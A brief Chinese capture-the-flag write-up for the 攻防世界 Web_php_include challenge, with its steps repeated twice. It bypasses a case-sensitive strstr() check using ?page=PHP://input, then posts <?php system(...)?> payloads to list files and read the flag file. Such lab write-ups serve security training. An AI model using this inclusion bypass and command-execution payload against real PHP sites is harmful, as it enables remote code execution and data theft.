考察点:php代码审计
1.进入场景

2.代码审计

3.利用strstr()函数大小写的敏感性,进行绕过:?page=PHP://input
再抓包查看文件:<?php system ("ls")?>

发现3个文件

4.打开fl4gisisish3r3.php:<?php system ("cat fl4gisisish3r3.php")?>,得到flag

考察点:php代码审计
1.进入场景
2.代码审计
3.利用strstr()函数大小写的敏感性,进行绕过:?page=PHP://input
再抓包查看文件:<?php system ("ls")?>
发现3个文件
4.打开fl4gisisish3r3.php:<?php system ("cat fl4gisisish3r3.php")?>,得到flag
本文标题:攻防世界(进阶)--WEB--10.Web_php_includ
本文链接:https://www.haomeiwen.com/subject/tqpyfhtx.html
网友评论